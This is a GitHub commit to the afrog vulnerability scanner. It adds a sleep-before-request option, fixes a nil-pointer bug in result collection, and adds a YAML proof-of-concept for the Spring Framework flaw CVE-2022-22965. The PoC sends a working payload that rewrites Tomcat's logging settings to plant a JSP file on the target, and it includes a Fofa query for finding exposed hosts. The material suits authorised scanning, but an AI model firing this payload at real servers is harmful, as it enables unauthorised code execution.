add before sleep & fixed result append nil pointer bug

rs0d · Apr 6, 2022 · 0502158 · 0502158
1 parent c1ed7ef
commit 0502158
Show file tree

Hide file tree

Showing 4 changed files with 52 additions and 2 deletions.
diff --git a/afrog-pocs/README.md b/afrog-pocs/README.md
@@ -59,6 +59,7 @@ rules:
     exppression: response.status == 200 && response.body.bcontains(b'PHP Version')
     stop_if_match: true
   r1:
+    before_sleep: 6
     request:
       method: GET
       path: /info.php
@@ -83,6 +84,8 @@ stop_if_match: 如果匹配就停止
 
 stop_if_mismatch：如果不匹配就停止
 
+before_sleep: 顾名思义，http 请求前 sleep 6 秒钟
+
 expression: 最外面的 `expression` 是 `rules` 的验证表达式，`r0() || r1()` 表示 `r0` 和 `r1` 两个规则，匹配一个表达式就为 `true`，代表漏洞存在。
 
 > 如果 rules 表达式都是 `||`关系，比如：r0() || r1() || r2() ... ，默认执行 `stop_if_match` 动作。同理，如果表达式都是 `&&` 关系，默认执行 `stop_if_mismatch` 动作。

diff --git a/afrog-pocs/unreviewed/CVE-2022-22965.yaml b/afrog-pocs/unreviewed/CVE-2022-22965.yaml
@@ -0,0 +1,34 @@
+id: CVE-2022-22965
+
+info:
+  name: Spring Framework RCE JDK 9+
+  author: zan8in
+  severity: critical
+  description: |
+    srping framework 结合JDK9及以上新版本的特性可以实现对历史漏洞补丁的绕过从而实现远程代码执行
+    Fofa: app="vmware-SpringBoot-Framework"
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22965
+
+set:
+  randTxt: randomInt(800000000, 1000000000)
+  exploitName: randomInt(800000000, 1000000000)
+rules:
+  r0:
+    request:
+      method: POST
+      path: /
+      headers:
+        C2: "<%"
+        Suffix: "%>"
+      body: |
+        class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7BC2%7Di%20if(%22j%22.equals(%22j%22))%7B%20out.println(new%20String(%22{{randTxt}}%22))%3B%20%7D%25%7BSuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={{exploitName}}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
+    expression: response.status == 200
+  r1:
+    before_sleep: 6
+    request:
+      method: GET
+      path: /{{exploitName}}.jsp
+    expression: response.status == 200 && response.body.bcontains(b'{{exploitName}}')
+
+expression: r0() && r1()
diff --git a/pkg/core/checker.go b/pkg/core/checker.go
@@ -5,6 +5,7 @@ import (
 	"net/http"
 	"net/url"
 	"strings"
+	"time"
 
 	"github.com/google/cel-go/checker/decls"
 	"github.com/zan8in/afrog/pkg/config"
@@ -75,6 +76,9 @@ func (c *Checker) Check(target string, pocItem poc.Poc) (err error) {
 		k := ruleMap.Key
 		rule := ruleMap.Value
 
+		if rule.BeforeSleep != 0 {
+			time.Sleep(time.Duration(rule.BeforeSleep) * time.Second)
+		}
 		utils.RandSleep(500)
 
 		isMatch := false
@@ -94,8 +98,14 @@ func (c *Checker) Check(target string, pocItem poc.Poc) (err error) {
 			c.UpdateVariableMap(rule.Output)
 		}
 
-		c.Result.AllPocResult = append(c.Result.AllPocResult,
-			&PocResult{IsVul: isMatch, ResultRequest: c.VariableMap["request"].(*proto.Request), ResultResponse: c.VariableMap["response"].(*proto.Response)})
+		pocRstTemp := PocResult{IsVul: isMatch}
+		if c.VariableMap["response"] != nil {
+			pocRstTemp.ResultResponse = c.VariableMap["response"].(*proto.Response)
+		}
+		if c.VariableMap["request"] != nil {
+			pocRstTemp.ResultRequest = c.VariableMap["request"].(*proto.Request)
+		}
+		c.Result.AllPocResult = append(c.Result.AllPocResult, &pocRstTemp)
 
 		if rule.StopIfMismatch && !isMatch {
 			c.Result.IsVul = false

diff --git a/pkg/poc/poc.go b/pkg/poc/poc.go
@@ -50,6 +50,7 @@ type Rule struct {
 	Output         yaml.MapSlice `yaml:"output"`
 	StopIfMatch    bool          `yaml:"stop_if_match"`
 	StopIfMismatch bool          `yaml:"stop_if_mismatch"`
+	BeforeSleep    int           `yaml:"before_sleep"`
 	order          int
 }
 
@@ -59,6 +60,7 @@ type ruleAlias struct {
 	Output         yaml.MapSlice `yaml:"output"`
 	StopIfMatch    bool          `yaml:"stop_if_match"`
 	StopIfMismatch bool          `yaml:"stop_if_mismatch"`
+	BeforeSleep    int           `yaml:"before_sleep"`
 }
 
 // http/tcp/udp cache 是否使用缓存的请求，如果该选项为 true，那么如果在一次探测中其它脚本对相同目标发送过相同请求，那么便使用之前缓存的响应，而不发新的数据包
@@ -164,6 +166,7 @@ func (r *Rule) UnmarshalYAML(unmarshal func(interface{}) error) error {
 	r.Output = tmp.Output
 	r.StopIfMatch = tmp.StopIfMatch
 	r.StopIfMismatch = tmp.StopIfMismatch
+	r.BeforeSleep = tmp.BeforeSleep
 	r.order = order
 
 	order += 1